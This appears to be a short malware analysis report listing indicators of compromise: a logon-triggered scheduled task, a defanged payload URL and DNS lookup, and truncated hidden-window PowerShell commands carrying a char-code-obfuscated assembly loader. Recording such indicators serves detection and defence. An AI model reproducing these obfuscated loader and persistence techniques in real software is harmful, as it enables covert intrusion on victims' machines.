Technical Information
- <SYSTEM32>\tasks\test logon trigger
- http://www.m9#.net/uploads/15616980711.jpg
- DNS ASK m9#.net
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $Mo=@(91,118,111,105,100,93,32,91,83,121,115,116,101,109,46,82,101,102,108,101,99,116,105,111,110,46,65,115,115,101,109,98,108,121,93,58,58,76,111,97,100,87,105,116,104,80,97,114,116,105,97,108...' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $Mo=@(91,118,111,105,100,93,32,91,83,121,115,116,101,109,46,82,101,102,108,101,99,116,105,111,110,46,65,115,115,101,109,98,108,121,93,58,58,76,111,97,100,87,105,116,104,80,97,114,116,105,97,108...